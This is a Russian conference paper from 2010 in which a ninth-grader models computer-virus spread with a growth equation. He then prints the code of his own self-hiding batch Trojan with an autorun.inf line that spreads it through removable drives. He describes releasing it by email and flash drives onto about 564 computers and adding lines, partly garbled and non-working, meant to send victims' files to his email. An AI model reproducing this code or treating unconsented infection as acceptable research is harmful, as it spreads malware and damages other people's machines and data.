Конгресс конференций
"Информационные технологии в образовании"
Всероссийская научно-практическая конференция
"Развивающие информационные технологии в образовании: использование учебных материалов нового поколения в образовательном процессе"
("ИТО-Томск-2010")
http://ito.edu.ru/2010/Tomsk
СБОРНИК ТРУДОВ
ИССЛЕДОВАНИЕ МОДЕЛИ РАСПРОСТРАНЕНИЯ КОМПЬЮТЕРНЫХ ВИРУСОВ
Луценко Иван Ивановичя
МОУ гимназия № 9, г. Кузнецк, Пензенская область
Обучаясь в Образовательном центре, учащиеся получают настолько высокий уровень подготовки, что оказываются в состоянии проводить исследовательскую работу на достаточно высоком для их возраста уровне. Данная работа выполнена учеником 9 класса, обучающемся по индивидуальной программе в ИТ-классе. Она содержит исследование модели распространения компьютерного вируса в сети Интернет. Автор помимо исследования модели создал компьютерный вирус, изучил механизм его распространения и сделал собственные, весьма неожиданные, выводы.
Научный руководитель: Бессонова Татьяна Николаевна
Для многих учителей очень остро встаёт проблема подготовки ребёнка к научно-исследовательской деятельности. Из всех трудностей, с которыми сталкивается учитель при организации такого вида работы, мне бы хотелось остановиться на отсутствии методических материалов для организации исследования. Именно здесь и приходят на помощь сотрудники ОЦ «Школьный университет». Методические пособия, разработанные образовательным центром, оказывают неоценимую помощь учителю в подготовке ребенка к созданию работы исследовательского характера. В них содержатся и направления исследования, и источники, к которым можно обратиться.
Работа, представляемая вашему вниманию, выполнена учеником 9 класса. Выполнена она при помощи методических материалов учебного центра.
Без сомнения, компьютерные технологии плотно вошли в нашу повседневную жизнь. Компьютеры используются практически во всех сферах жизни человеческого общества: от школьных кабинетов информатики до компьютерных систем охраны государственной безопасности.
Вирусные атаки на компьютеры с каждым годом набирают свои обороты. Количество создаваемых компьютерных вирусов возрастает катастрофическими темпами. По прогнозу руководителя антивирусной лаборатории компании «Лаборатория Касперского» Станислава Шевченко в 2009 году ожидался прирост объемов вредоносного кода 1 терабайт (1024 гигабайта) ежемесячно. Становится наиболее актуальной тема защиты компьютеров, разработки антивирусных проектов. В наше время информация, необходимая для создания вредоносных программ легкодоступна во Всемирной сети, и любой желающий может воспользоваться ей. Именно из-за доступности подобных обучающих статей возникает проблема создания вирусов студентами и школьниками. Кевин Митник, Стивен Сильверман, Свен Яшан, и многие, многие другие, чьи имена вошли в историю вирусописания и чьи деяния доставили множество бед обычным пользователям, нанесли финансовый урон многим компаниям. Видимо неслучайно существует программа Microsoft Antivirus Award , в которой создан фонд в $5 млн., предназначенный для награждения людей, предоставивших информацию о распространителях компьютерных вирусов. Microsoft предложила три награды по $250 тыс. за сведения об ответственных за вирусы MSBlast, Sobig и MyDoom.
Но может быть, разговоры о серьезной опасности, исходящей от юных создателей вирусов, это просто рекламный трюк для более активной продажи антивирусных программ? И проблема не так уж и серьезна? Я решил данный вопрос изучить более подробно и попробовать свои силы в создании подобной программы — вируса Win32_systemVV.
Цель моей работы — изучение механизма распространения компьютерных вирусов.
Гипотеза: «Может ли вирус, созданный обычным школьником, стать серьезной помехой для работы пользователя?»
Для ответа на поставленные мной вопросы, я решил исследовать материалы литературы и публикации Интернете. В основном, авторы изученных мной публикаций, проводят аналогию компьютерного вируса с биологическим. И это обоснованно, так как в модели распространения того и другого имеются ряд сходственных признаков. Можно выделить следующие: алгоритм заражения объекта, принцип разрушения объекта и воздействие вируса на организм, или объект; механизм защиты объекта от вируса. С математической точки зрения и компьютерные, и биологические вирусы имеют сходные числовые параметры, один из них — средняя плодовитость в единицу времени, то есть скорость производства вирусом своих копий. Важный параметр — это насколько незаметен вирус в клетке, уничтожает ли он клетку или спокойно и относительно безвредно в ней существует. Другие параметры так же имеют сходное значение. Например, процент заражённых клеток, из всех доступных для заражения, соответствует доле поражённых компьютеров среди всех систем с уязвимой для данного вируса операционной системой. Аналогично : концентрация вирусов в крови, что в некотором смысле соответствует концентрации вирусов в пересылаемых по Интернету в электронных сообщениях. Количество антител в кровеносной системе тогда соотносится с количеством почтовых серверов, установивших противовирусный фильтр. Таким образом, похожие процессы распространения компьютерных вирусов в сети Интернета и развитие биологических вирусов в человеческом организме можно описать сходными математическими уравнениями.
Так как процессы распространения компьютерного и биологического вирусов описываются сходными математическими уравнениями, распространение компьютерных вирусов ILOVEYOU, Win32.HLLW, Spyware, и им подобных, можно рассмотреть с помощью одной из базовых биологических моделей — моделей неограниченного роста.
В основе этой модели лежит предположение, что коэффициент производства вирусом этих копий (коэффициент роста, коэффициент распространения) пропорционален числу вирусов. Построение общей математической модели начнём, моделируя процесс распространения компьютерного вируса в сети Интернета в « чистом виде», без ограничительных факторов.
Пусть начальная численность « популяции заражённых компьютеров» равна 
.
Предположим, что численность популяций зависит только от роста популяций. Обозначим коэффициент роста — R.
R показывает, во сколько раз увеличилась численность популяции за некоторый промежуток времени.
Следовательно, если в начальный момент времени начальная численность популяции была , то в следующий (первый) момент времени численность популяции будет равна:
Во второй момент времени численность популяции опять увеличивается в R раз и будет равна:
Численность популяции в 
— й момент времени будет равна:
(1)
где:
— численность популяции в i-й и моменты времени; R — коэффициент роста популяции.
Мы рассматриваем изменение численности популяции в течение какого-то времени. Предположим, что общее время роста нашей популяции равно T, а период роста популяции (тот промежуток времени, за который численность популяции увеличивается в R раз: шаг, с которым исследуется процесс) равен 
. Заметим, что для разных биологических видов период имеет различную протяжённость.
Тогда можно посчитать, сколько периодов (N) мы исследуем.
(2)
То есть, в формуле (1) индекс i изменяется от 0 до N, где N — количество временных интервалов (момента времени).
Таким образом, формулы (1—2) описывают математическую модель неограниченного распространения компьютерного вируса в сети Интернета.
Параметрами модели являются:
); ). Построенная модель позволяет исследовать динамику численности «популяции заражённых компьютеров», т. е. распространение компьютерных вирусов в сети Интернета.
Математическая модель имеет вид:
Построив линию тренда распространения компьютерных вирусов, мы получаем один из пяти типов линии тренда — полиномиальный, т. к. математическую модель можно описать уравнением 
Опираясь на изученный материал, на анализ распространения и работы вирусов, я решил написать собственный «вирус» (программу — Троян), изменяющий некоторые настройки ОС (дата, время), не больше.
Изучив в Интернете материал по созданию простейших вредоносных программ, (который, между прочим, находится в свободном доступе), я создал программу, изменяющую время и дату на компьютере «жертвы» на 21 декабря 2012 г. и копирующий себя на флэш носитель (если тот подключен) и на жёсткий диск. После чего делается невидимым. Тело вируса выглядит так:
@echo off
md D:\VVsystem
copy %0 D:\VVsystem\Win32_systemVV.bat
attrib D:\VVsystem\Win32_systemVV.bat +h +s +a +r
time 3:00
date 21.12.2012
label C:Hacked
label D:Hacked
label H:Hacked
md H:\VVsystem
copy %0 H:\VVsystem\Win32_systemVV.bat
attrib H:\VVsystem\Win32_systemVV.bat +h +s +a +r
pause
cls
Вирус можно модифицировать, чтобы он имел возможность запускаться при загрузке Windows, но так как это всего лишь тестовая вредоносная программа, оставим код прежним. Но для того, чтобы вирус стал полноценным, необходимо добавить код, позволяющий программе копироваться со съёмных носителей на компьютер, к которому эти носители подключены. Команда Echo run=H:\ VVsystem\Win32_systemVV.bat>>autorun.inf добавляет в тело автозагрузчика autorun.inf код, запускающий наш вирус «Win32_systemVV.bat» при открытии съёмного носителя.
Теперь, когда вирус — Троян готов, можно беспрепятственно запускать его на файлообменные серверы, вместе с интересными, привлекающими внимание файлами. При их открытии вирус начнёт свою работу, оставаясь невидимым для жертвы.
Самое интересное, что подобные *.bat вирусы не обнаруживаются антивирусными программами, так как всего лишь выполняют команда самой ОС, что, по мнению «сторожей», никак не может навредить компьютеру.
Чтобы доказать гипотезу об угрозе вредоносных программ, написанных школьниками, необходимо было написанный мной вирус запустить «в оборот»
Через электронную почту и flash-носители я начал распространения моего вируса.
Добавив в тело программы строчки
find %windir%\sistem32\regedt32.exe
if exist %windir%\sistem32\regedt32.exe copy %windir%\sistem32\regedt32.exe
D:\VVsystem\
send D:\VVsystem\ regedt32.exe vanchokus@mail.ru > nul,
я отсылал данные реестра компьютера жертвы на свой электронный адрес, после чего можно было судить, сколько компьютеров было заражено моим вирусом за определённый промежуток времени.
За один день вирусом Win32_systemVV заразилось примерно 30 пользовательских машин. Учитывая моё общение с друзьями и их желание включиться в эксперимент, я получил, что через месяц испытаний вирусом заразились 564 компьютера. Но, несмотря на все мои старания и умения, потраченные на совершенствование вируса, я не смог превысить этот предел количества заражённых компьютеров. Мой *.bat — вирус слишком банален, для того чтобы совершать массовые атаки, провоцировать эпидемии. Даже, несмотря на то, что вредоносную программу не обнаруживают антивирусы, она не может дать стопроцентную гарантию заражения, так как невозможно предугадать все варианты модификации системы и похищение данных не всегда срабатывает.
ВЫВОД.Таким образом, напрашивается вывод, что непрофессиональные пользователи компьютеров НЕ МОГУТ создать такой вирус, чтобы он спровоцировал массовую атаку. По-настоящему опасные вирусы требуют огромных знаний, которые юные пользователи компьютеров получить не смогут. В Интернете встречается много статей, посвящённых вирусописанию, но большинство этих статей писали такие же неопытные хакеры, которые изучили только азы программирования. Для написания хорошей вредоносной программы нужен опыт, и только опыт. И, тем не менее, вред от вирусов очень велик. И мне кажется, что можно направить ситуацию на пользу обществу, организовав фонд, вознаграждающий программистов, которые добровольно «сдали» свой вирус в базу данных компаний, занимающихся созданием антивирусных программ, или найти для них возможность для бесплатного пользования сетью Интернет на какой-то промежуток времени. С одной стороны, это предложение может показаться абсурдным, но если посмотреть на данную проблему под другим углом, может быть и стоит задуматься. Прежние меры борьбы с хакерами дают незначительные результаты. Вред от вирусописания настолько велик, что за рубежом уже решили привлечь хакеров на пользу обществу. Известно, что Министерство Национальной Безопасности США (Department of Homeland Security) готово принять на работу хакеров, желающих перейти по другую сторону баррикад и встать на защиту национальной Интернет-инфраструктуры. В объявлении, опубликованном компанией General Dynamics Information Technology по поручению DHS, перечислены основные требования, предъявляемые к кандидатам. Работодатель делает особый акцент на том, что соискатели должны понимать образ мыслей «плохих парней» и продемонстрировать высокий уровень владения хакерскими методиками и инструментами. В обязанности принятых на службу специалистов будет входить тщательный анализ сетевого трафика и обнаружение уязвимостей в федеральных ИТ-системах. Возможно, такой призыв в скором времени прозвучит и в нашей стране. Прием, предлагаемый мной, позволит легализовать вирусописателей и зарегистрировать их в специальной базе данных. А особенно «талантливых» можно будет в будущем привлекать к работе по защите Российской интернет-инфраструктуры.
Литература
